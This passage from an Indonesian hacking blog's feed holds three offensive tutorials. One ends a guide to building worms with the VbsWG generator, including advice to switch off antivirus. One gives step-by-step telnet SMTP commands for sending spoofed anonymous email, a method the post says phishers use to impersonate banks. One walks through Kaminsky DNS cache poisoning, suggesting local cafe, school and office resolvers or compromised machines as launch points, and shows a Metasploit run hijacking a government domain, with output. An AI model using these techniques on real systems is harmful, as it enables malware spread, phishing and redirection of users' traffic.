&lt;/div&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;Exe Path&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;Berfungsi untuk mencari file yang akan ditambahkan kedalam worm, usahakan kurang dari 350 kb sebab size worm bisa menjadi sangat besar.&lt;/p&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;  &lt;/p&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;Setelah mengetahui fitur-fitur dari VbsWG ini, maka anda sudah bisa membuat sebuah worm. Tapi ada satu hal yang perlu diingat, kadang kala saat worm sudah selesai di buat dan di generat, tapi malah terjadi error. Untuk menanggulangi hal ini, langkah yang perlu diambil ialah, pada saat pembuatan worm, pilihlah opsi &lt;b&gt;&lt;i&gt;View worm source&lt;/i&gt;&lt;/b&gt; after creating.&lt;/p&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbbJuKGmbBiYpu8lkzg2no7TJdsrOhjhUM1O43FyEJ36dT0ARuQsrQ8QtHLO4GDfMUMY1nKmUcuFWgChZTuzSn0CgO5rnR8SDzyLpvBwR6GTi7_G1N7uAJ6NROaAkUHHP424N2h9WfRk4/s1600-h/capture_13112008_025206+copy.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 384px; height: 334px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbbJuKGmbBiYpu8lkzg2no7TJdsrOhjhUM1O43FyEJ36dT0ARuQsrQ8QtHLO4GDfMUMY1nKmUcuFWgChZTuzSn0CgO5rnR8SDzyLpvBwR6GTi7_G1N7uAJ6NROaAkUHHP424N2h9WfRk4/s400/capture_13112008_025206+copy.jpg" alt="" id="BLOGGER_PHOTO_ID_5269856387574461010" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style=""&gt;lalu pada baris kedua tambahkan kalimat &lt;i&gt;on error resume next&lt;/i&gt; ini berlaku untuk semua kasus error&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIpnts8R5f2O7cgutC6BDB4-Haz_xwDjdxZjuZYYoLI-sLNIG8XqKSKG1DF8KzDDnoOPlnQGwtQI0e5Nl7f6882yFEsCrI4e56OsY31oqPp0TEEbp-9SyR_VQHmqkNAXDepqAXOU17u1U/s1600-h/capture_13112008_025310.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 280px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIpnts8R5f2O7cgutC6BDB4-Haz_xwDjdxZjuZYYoLI-sLNIG8XqKSKG1DF8KzDDnoOPlnQGwtQI0e5Nl7f6882yFEsCrI4e56OsY31oqPp0TEEbp-9SyR_VQHmqkNAXDepqAXOU17u1U/s400/capture_13112008_025310.jpg" alt="" id="BLOGGER_PHOTO_ID_5269856841628366898" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;Yang perlu diingat saat anda akan membuat worm, usahakan pada system terinstall &lt;b&gt;freezer&lt;/b&gt; agar anda bisa mengembalikan keadaan computer seperti sedia kala setelah di restart dan matikan &lt;b&gt;antivirus&lt;/b&gt;, karena antivirus akan menangkap file worm yang telah anda buat.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;p style="margin-bottom: 0.0001pt; text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;span style=""&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://xpemula.blogspot.com/2008/11/bagi-anda-yang-akrab-dengan-computer.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY998hgXW5wauWpIiYFXrqJZBe_2uNiGAsaisvnZNDJgwh_0mek8De-e760U7BiRBEg7lUGQOPjv0uLS70xT4X_PS5NrepnNegRrfZ6IDfRXQxTp35IoZHT3BRBWnMjpNemAYGHMZ4yfY/s72-c/capture_13092000_065556.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-6061421019745001350</guid><pubDate>Tue, 02 Sep 2008 15:10:00 +0000</pubDate><atom:updated>2009-03-12T19:56:40.863-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Mengirim Email Kaleng</title><description>&lt;div style="text-align: justify;"&gt;Kejadian ini terjadi beberapa waktu yang lalu ketika saya bermaksud memberitahukan kepada seorang teman bahwa ID dan Paaword nya telah berhasil disadap ketika ia berselancar di sebuah warnet. Karena saya punya pengalaman buruk dimana saat memberitahukan hal semacam ini kepada yang bersangkutan justru saya yang dituduh, maka saya putuskan untuk memberitahunya melalui email kaleng (tanpa pengirim yang jelas). Inilah yang akan kita bahas pada tulisan kali ini.&lt;br /&gt;Pada dasarnya, yang saya gunakan disini adalah memanfaatkan server yang membuka port 25 dengan telnet. Telnet sendiri merupakan protokol yang menggunakan protokol TCP/IP dan digunakan untuk melakukan koneksi dengan remote komputer.&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Untuk mencari server yang membuka port 25, silahkan gunakan tool scaner yang anda sukai.&lt;br /&gt;Kita asumsikan Anda telah mendapatkan target, kemudian lakukan langkah berikut:&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;1. Pada Command Prompt ketikkan: telnet target 25 kemudian enter. Perhatikan gambar dibawah ini, disini saya menggunakan 202.169.224.5, jadi perintahnya menjadi &lt;span style="font-style: italic;"&gt;telnet 202.169.224.5 25.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinbLdu_I6Lm5JsATt-ej1YbyKFfYH2hO8hFa9NtmwRFsSG5TZSon9g3ngmg562nb4G_OdH1LQ5QIS5eo46eI5YGLaRrWQOBh1UW5fqDS8U4YZflqjxxEAmeX4Q029HaURjoXeHqTF9_cM/s1600-h/capture_26022009_222535.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinbLdu_I6Lm5JsATt-ej1YbyKFfYH2hO8hFa9NtmwRFsSG5TZSon9g3ngmg562nb4G_OdH1LQ5QIS5eo46eI5YGLaRrWQOBh1UW5fqDS8U4YZflqjxxEAmeX4Q029HaURjoXeHqTF9_cM/s400/capture_26022009_222535.jpg" alt="" id="BLOGGER_PHOTO_ID_5241683492002815266" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;2. Setelah anda masuk ke server&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjax16K9xrfqmGp9UAezGfbxpNliOTm-KFGXuZV4ZYfnHW8_fTaIE1m0j61v7VgyBKMGdU5gGjTpz0LqjkR6_yb6x7uIdNz_TXRDgk4SpBItgM7UyTwqz7NLB9LHf8soSEDuoZ3Ss2r5vw/s1600-h/capture_17082008_143008.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjax16K9xrfqmGp9UAezGfbxpNliOTm-KFGXuZV4ZYfnHW8_fTaIE1m0j61v7VgyBKMGdU5gGjTpz0LqjkR6_yb6x7uIdNz_TXRDgk4SpBItgM7UyTwqz7NLB9LHf8soSEDuoZ3Ss2r5vw/s400/capture_17082008_143008.jpg" alt="" id="BLOGGER_PHOTO_ID_5241690012001631474" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;ketikkan HELO [nama.server.smtp] enter&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZXYkFY1MUpf0QctxLyOwpNM5LPSpqnkG9DdtC3_OXw_E59T-JBNzMEM8qw1MT0eTqCA-L0P9rvlspPr_8LfBKIm7DfuCpIQvUCI0TWcpIb0ehsYNsMqMlTj24990K6tTGNSSHj9goFbM/s1600-h/capture_17082008_143741.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZXYkFY1MUpf0QctxLyOwpNM5LPSpqnkG9DdtC3_OXw_E59T-JBNzMEM8qw1MT0eTqCA-L0P9rvlspPr_8LfBKIm7DfuCpIQvUCI0TWcpIb0ehsYNsMqMlTj24990K6tTGNSSHj9goFbM/s400/capture_17082008_143741.jpg" alt="" id="BLOGGER_PHOTO_ID_5241690481466432402" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;3. Masukkan alamat pengirim dengan format MAIL FROM: alamat@pengirim [enter]. Misalnya &lt;span style="font-style: italic;"&gt;MAIL FROM: black_signal@xpemula.tk&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBYBrNQznWwdMju6oRlpck9r1RdJZU0fW_Qmjlv3xZVTvV3N-GExbjEBB-UuJ7QvBxo56K4mynBce1JiqdivBlyi1OeSNDx9_1uQYUV4up8GKOeOoB9ilBmENBLjMWEfjNF7gZj_Oh1zw/s1600-h/capture_03092008_141055.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBYBrNQznWwdMju6oRlpck9r1RdJZU0fW_Qmjlv3xZVTvV3N-GExbjEBB-UuJ7QvBxo56K4mynBce1JiqdivBlyi1OeSNDx9_1uQYUV4up8GKOeOoB9ilBmENBLjMWEfjNF7gZj_Oh1zw/s400/capture_03092008_141055.jpg" alt="" id="BLOGGER_PHOTO_ID_5241691058615944226" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;4. Setelah mucul tulisan '250 ok' masukkan alamat pengirim dengan format RCPT TO: alamat@pengirim [enter]. Sebagai contoh email i9ni saya tujukan ke alamat email saya yang beralamat di cord_weapon@yahoo.it, jadi perintah lengkapnya menjadi &lt;span style="font-style: italic;"&gt;RCPT TO: cord_erapon@yahoo.it&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_vrbRt2V6Dyk7U-cfMmzePbenzqZm9vMosQw-06Lh45DT5m7qiPDIQmaqra-6asvj3-LvW592EO2jBum2kS2VBXLJUcdcQ_6bzRZJgN8_LPTwGqV9TnutOX9ZicR8nnEc6cz5NAdT7SU/s1600-h/capture_26022009_220018.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_vrbRt2V6Dyk7U-cfMmzePbenzqZm9vMosQw-06Lh45DT5m7qiPDIQmaqra-6asvj3-LvW592EO2jBum2kS2VBXLJUcdcQ_6bzRZJgN8_LPTwGqV9TnutOX9ZicR8nnEc6cz5NAdT7SU/s400/capture_26022009_220018.jpg" alt="" id="BLOGGER_PHOTO_ID_5241691369833802274" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;5. Tulisan '250 ok' akan kembali muncul. Ketikkan DATA diikuti enter&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSbZr6f0zeE0j54xHJi23_AoFCxmxDRmTnBceSxwNgFqUYHKQcKqyVAvcR4Zm2FIHIyD2uEa4BkYXR-cKfOni-VY7WHlMvyEJOKYibuSeD9UDXSvUJotSXH34_-L6WSoDlmWgtr85nmPQ/s1600-h/capture_26022009_220049.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSbZr6f0zeE0j54xHJi23_AoFCxmxDRmTnBceSxwNgFqUYHKQcKqyVAvcR4Zm2FIHIyD2uEa4BkYXR-cKfOni-VY7WHlMvyEJOKYibuSeD9UDXSvUJotSXH34_-L6WSoDlmWgtr85nmPQ/s400/capture_26022009_220049.jpg" alt="" id="BLOGGER_PHOTO_ID_5241691575599163954" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;6. Kali ini tulisan yang keluar '354 go ahead', setelah itu ketikkan isi pesannya. Misalnya seperti ini..&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify; font-style: italic;"&gt;FROM: black_signal@xpemula.tk&lt;br /&gt;CC:&lt;br /&gt;Subject: Mengirim Email Kaleng&lt;br /&gt;Date: Tue, 02 September 2008&lt;br /&gt;&lt;br /&gt;Saya mencoba untuk mengirim email dengan alamat semau saya, hal ini saya lakukan agar si penerima tidak mengetahui dari siapa email ersebut datang. Deangan demikian identitas saya sebagai pengirim tidak akan diketahui penerima.&lt;br /&gt;&lt;br /&gt;Terima kasih&lt;br /&gt;.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij1os-L6Qp_3gP6BlTxdfoeTNLxbPTTK4iNMi6Ad24FbAgIBgt0qq8_r8wyHDZ8mjGCGXA5yC4X0goQZbuCOu2aFQd4OPiWmjCdWjKUAwCo-aoUUnzwAW6EDO7fzUL0dvyPASnEP-GRH4/s1600-h/capture_26022009_220501.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij1os-L6Qp_3gP6BlTxdfoeTNLxbPTTK4iNMi6Ad24FbAgIBgt0qq8_r8wyHDZ8mjGCGXA5yC4X0goQZbuCOu2aFQd4OPiWmjCdWjKUAwCo-aoUUnzwAW6EDO7fzUL0dvyPASnEP-GRH4/s400/capture_26022009_220501.jpg" alt="" id="BLOGGER_PHOTO_ID_5241692096688920082" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Perhatikan tanda '.' (titik) paling bawah. Tanda titikk merupakan akhir dari statment yang menandakan penulisan email telah selesai dan email harus segera dikirim. Setelah titik diikuti enter 2 kali.&lt;br /&gt;&lt;/div&gt;Untuk mengecek kebenarannya, mari kita buka email tujuan tadi.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXxhPaEBbHaiLT8VLIk8n_1AZpbEYJpBg0-G3ttkdzjXegTJTLLr3yD19k44zc2GIteKG7OPACwYMq06zoEFzq06qzSkN3jmcnFlc7LNu7UrVSN6y_796rNqQCxnVmexJkSKfrCQdMmIg/s1600-h/capture_26022009_220855.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXxhPaEBbHaiLT8VLIk8n_1AZpbEYJpBg0-G3ttkdzjXegTJTLLr3yD19k44zc2GIteKG7OPACwYMq06zoEFzq06qzSkN3jmcnFlc7LNu7UrVSN6y_796rNqQCxnVmexJkSKfrCQdMmIg/s400/capture_26022009_220855.jpg" alt="" id="BLOGGER_PHOTO_ID_5241692433870267906" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;Tips&lt;/span&gt;: Apabila anda salah dalam mengetikkan perintah, anda harus mengulang dari awal sebab sistem akan membaca string gabungan yang lama dan yang baru anda ketikkan.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;Tambahan&lt;/span&gt;: Cara pengiriman email diatas sering digunakan oleh para pencuri data untuk mengelabui nasabah bank dengan mengirim email atas nama bank yang bersangkutan.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;</description><link>http://xpemula.blogspot.com/2008/09/mengirim-email-kaleng.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinbLdu_I6Lm5JsATt-ej1YbyKFfYH2hO8hFa9NtmwRFsSG5TZSon9g3ngmg562nb4G_OdH1LQ5QIS5eo46eI5YGLaRrWQOBh1UW5fqDS8U4YZflqjxxEAmeX4Q029HaURjoXeHqTF9_cM/s72-c/capture_26022009_222535.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-6228537071534203816</guid><pubDate>Wed, 20 Aug 2008 07:00:00 +0000</pubDate><atom:updated>2009-03-12T19:57:53.253-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>BUG DNS</title><description>&lt;div style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;Issue ke-19 echo&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div face="times new roman" style="text-align: justify;"&gt;Bugs DNS yang ditemukan oleh Dan Kaminsky merupakan bugs DNS paling parah sepanjang sejarah internet, beberapa pihak bahkan menyebutkan bugs DNS ini merupakan bugs paling parah diantara seluruh jenis bugs yang pernah ditemukan. Rasanya memang tidak salah jika Dan merencanakan metode patch yang baru pertama kali dilakukan oleh dunia sejak internet ditemukan dimana rilis patch dilakukan secara bersamaan dengan dukungan lebih dari 80 vendor DNS.&lt;br /&gt;&lt;br /&gt;Jenis hole yang ditemukan oleh Dan Kaminsky merupakan perpaduan antara old attack #1 dan old attack #2. Hole tersebut memanfaatkan kelemahan QID yang hanya 16 bit disertai penggunaan protokol UDP sehingga dapat di bruteforce menggunakan paket flooding, dan memanfaatkan kelemahan pada "bailiwick checking". Bentuk response dari hole Dan kaminsky sebagai berikut:&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;;; QUESTION SECTION:&lt;br /&gt;;notexist.depkominfo.go.id.  IN A&lt;br /&gt;&lt;br /&gt;;; ANSWER SECTION:&lt;br /&gt;notexist.depkominfo.go.id. 120 IN A 41.41.41.41&lt;br /&gt;&lt;br /&gt;;; AUTHORITY SECTION:&lt;br /&gt;depkominfo.go.id.  86400 IN NS www.depkominfo.go.id.&lt;br /&gt;&lt;br /&gt;;; ADDITIONAL SECTION:&lt;br /&gt;www.depkominfo.go.id.  604800 IN A 41.41.41.42&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:times new roman;"&gt;Penyerang berusaha untuk membuat resolver melakukan query terhadap notexist.depkominfo.go.id, dan kemudian juga sekaligus mengirimkan response untuk notexist.depkominfo.go.id pada bagian answer, menyediakan informasi authority nameserver domain tersebut pada bagian authority section, dan...memberikan alamat IP nameserver domain tersebut pada bagian additional section. Harap diingat bahwa penyerang juga harus menyesuaikan QID response yang dikirimkan agar data tipuan tersebut dimasukan pada cache dns target. Jika berhasil, maka cache dns server akan teracuni informasi palsu dan mengarahkan&lt;/span&gt; semua request depkominfo.go.id menuju nameserver yang telah dipersiapkan oleh penyerang.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify; font-family: times new roman;"&gt;Hole ini berhasil mematahkan proses in-bailiwick checking resolver. Nameserver/resolver yang dijadikan target serangan akan percaya sepenuhnya pada response tersebut karena www.depkominfo.go.id memang berada didalam bailiwick checking (*.depkominfo.go.id).&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;That's it?! so simple, isn't it? :).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;======= Teknik Eksploitasi ---|&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:times new roman;"&gt;Dengan adanya public disclosure mengenai hole ini, maka exploit beserta aksi kejahatan lainnya merebak dalam waktu kurang dari 24 jam. Pada bagian akhir&lt;/span&gt; &lt;span style="font-family:times new roman;"&gt;kita akan membahas kemungkinan jenis kejahatan yang dapat dilakukan dengan memanfaatkan hole ini. Teknik eksploitasi ada berbagai macam, selain logic&lt;/span&gt; &lt;span style="font-family:times new roman;"&gt;serangan yang akan mempengaruhi hasilnya, bahasa pemrograman yang digunakan juga ikut berperan serta. Berdasarkan keterangan Dan kaminsky, awalnya&lt;/span&gt; &lt;span style="font-family:times new roman;"&gt;digunakan python sebagai eksploit namun karena terlalu lamban maka diganti menggunakan C. C diklaim dapat melakukan dns cache poisoning suatu resolver&lt;/span&gt; &lt;span style="font-family:times new roman;"&gt;dalam watu kurang dari 1 menit (kecepatan internet juga mempengaruhi). Berikut ini permasalahan yang dihadapi untuk membuat eksploit hole diatas:&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;1. QID/TXID&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify; font-family: times new roman;"&gt;&lt;span style="font-family:times new roman;"&gt;Inti dari hole Kaminsky adalah pada bailiwick checking, namun kita tetap berhadapan dengan masalah QID DNS. Untuk implementasi DNS server saat ini dimana QID merupakan data 16 bit maka dibutuhkan mekanisme agar dapat lebih dahulu memberikan response dengan QID yang tepat kepada resolver.  Bentuk eksploit saat ini menggunakan trik non-exist domain, misal: aaaa.google.com, aaab.google.com, dst. Sehingga apabila paket response dari nameserver asli datang lebih dulu maka jawabannya adalah NXDOMAIN (non-exist domain), sedangkan jika pake response hasil spoofing kita sampai lebih dulu maka jawabannya adalah alamat nameserver (A). Tehnik bruteforce QID ada berbagai macam dan dapat digunakan untuk meloloskan paket bruteforce response kita.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;2. UDP Protocol&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify; font-family: times new roman;"&gt;Hal ini berkaitan dengan konfigurasi dan implementasi nameserver itu sendiri. Beberapa nameserver menggunakan random source port saat melakukan dns query, sehingga jika kita ingin melakukan spoofing paket response bukan hanya harus menebak QID yang digunakan server tersbut saat mengirimkan query namun juga harus menebak source udp port yang digunakan. Hal ini menambah kompleksitas bruteforce menjadi 2^16 x 2^16 (16 bit QID x 16 bit source udp port).&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;3. Speed&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify; font-family: times new roman;"&gt;Kecepatan koneksi juga ikut mempengaruhi proses bruteforce, hal ini adalah masalah klasik. Jika kita menggunakan koneksi dial-up (telkomnet????) untuk menyerang nameserver suatu ISP mungkin akan sia-sia, karena koneksi antara DNS server ISP dengan DNS server domain yang asli lebih cepat dibandingkan koneksi kita dengan DNS ISP maka paket response dari DNS server domain asli akan sampai lebih dulu. Hal ini mungkin akan berbeda jika kita bisa memiliki koneksi yang sangat cepat. Teknik paling mudah adalah menyerang DNS lokal (warnet, sekolah, kantor, dll) karena koneksi antara komputer yang kita gunakan untuk menyerang umumnya lebih cepat dibandingkan koneksi antara DNS server lokal tersebut dengan DNS server domain asli.&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;4. Recursive&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify; font-family: times new roman;"&gt;Beberapa konfigurasi DNS server tidak mengijinkan dilakukan recursive query, atau membatasi recursive query hanya pada network tertentu sehingga akses melakukan eksploitasi terbatas hanya pada lokal area network tempat DNS server tersebut berada.&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;=======  Exploit in Action ---|&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:times new roman;"&gt;Untuk contoh penggunaan eksploit dan efeknya penulis menggunakan metasploit&lt;/span&gt; &lt;span style="font-family:times new roman;"&gt;framework. Dalam real attack penggunaan metasploit framework jelas kurang &lt;/span&gt;&lt;span style="font-family:times new roman;"&gt;efisien karena masih terlalu lama untuk dapat sukses melakukan injeksi, &lt;/span&gt;&lt;span style="font-family:times new roman;"&gt;terlebih lagi jika kita menggunakan koneksi yang lamban (somehow, masalah ini&lt;/span&gt; &lt;span style="font-family:times new roman;"&gt;bisa diatasi, mis: dengan melakukan serangan via salah satu mesin korban lain &lt;/span&gt;&lt;span style="font-family:times new roman;"&gt;yang telah di own dan memiliki bandwidth tinggi ;) ), namun prinsip kerja &lt;/span&gt;&lt;span style="font-family:times new roman;"&gt;metasploit (terutama kalkulasi jumlah spoofing paket per query dan response)&lt;/span&gt; &lt;span style="font-family:times new roman;"&gt;cukup lengkap untuk dijadikan sebagai referensi.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;msf auxiliary(bailiwicked_domain) &gt; show options&lt;br /&gt;&lt;br /&gt;Module options:&lt;br /&gt;&lt;br /&gt;Name     Current Setting   Required  Description&lt;br /&gt;----     ---------------   --------  -----------&lt;br /&gt;DOMAIN   depkominfo.go.id  yes       The domain to hijack&lt;br /&gt;NEWDNS   192.168.2.105     yes       The hostname of the replacement DNS server&lt;br /&gt;RECONS   208.67.222.222    yes       The nameserver used for reconnaissance&lt;br /&gt;RHOST    192.168.2.102     yes       The target address&lt;br /&gt;SRCADDR  Real              yes       The source address to use for sending the queries (accepted: Real, Random)&lt;br /&gt;SRCPORT  53                yes       The target server's source query port (0 for automatic)&lt;br /&gt;TTL      44910             yes       The TTL for the malicious host entry&lt;br /&gt;XIDS     0                 yes       The number of XIDs to try for each query (0 for automatic)&lt;br /&gt;&lt;br /&gt;msf auxiliary(bailiwicked_domain) &gt; exploit&lt;br /&gt;[*] Targeting nameserver 192.168.2.102 for injection of depkominfo.go.id. nameservers as 192.168.2.105&lt;br /&gt;[*] Querying recon nameserver for depkominfo.go.id.'s nameservers...&lt;br /&gt;[*]  Got an NS record: depkominfo.go.id.       3496    IN      NS      ns.depkominfo.go.id.&lt;br /&gt;[*]   Querying recon nameserver for address of ns.depkominfo.go.id....&lt;br /&gt;[*]    Got an A record: ns.depkominfo.go.id.    3496    IN      A       222.124.199.71&lt;br /&gt;[*]     Checking Authoritativeness: Querying 222.124.199.71 for depkominfo.go.id....&lt;br /&gt;[*]     ns.depkominfo.go.id. is authoritative for depkominfo.go.id., adding to list of nameservers to spoof as&lt;br /&gt;[*]  Got an NS record: depkominfo.go.id.       3496    IN      NS      ns1.depkominfo.go.id.&lt;br /&gt;[*]   Querying recon nameserver for address of ns1.depkominfo.go.id....&lt;br /&gt;[*] Calculating the number of spoofed replies to send per query...&lt;br /&gt;[*]   race calc: 100 queries | min/max/avg time: 1.11/188.08/3.72 | min/max/avg replies: 368/65438/1313&lt;br /&gt;[*] Sending 1969 spoofed replies from each nameserver (1) for each query&lt;br /&gt;[*] Attempting to inject poison records for depkominfo.go.id.'s nameservers into 192.168.2.102:53...&lt;br /&gt;[*] Poisoning successful after 250 queries and 492250 responses: depkominfo.go.id. == 192.168.2.105&lt;br /&gt;[*] Auxiliary module execution completed&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Jasmine:~ Cyberheb$ dig -t NS @192.168.2.102 depkominfo.go.id&lt;br /&gt;&lt;br /&gt;; &lt;&lt;&gt;&gt; DiG 9.4.1-P1 &lt;&lt;&gt;&gt; -t NS @192.168.2.102 depkominfo.go.id&lt;br /&gt;; (1 server found)&lt;br /&gt;;; global options:  printcmd&lt;br /&gt;;; Got answer:&lt;br /&gt;;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 49356 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0  ;; QUESTION SECTION: ;depkominfo.go.id.  IN NS  ;; ANSWER SECTION: 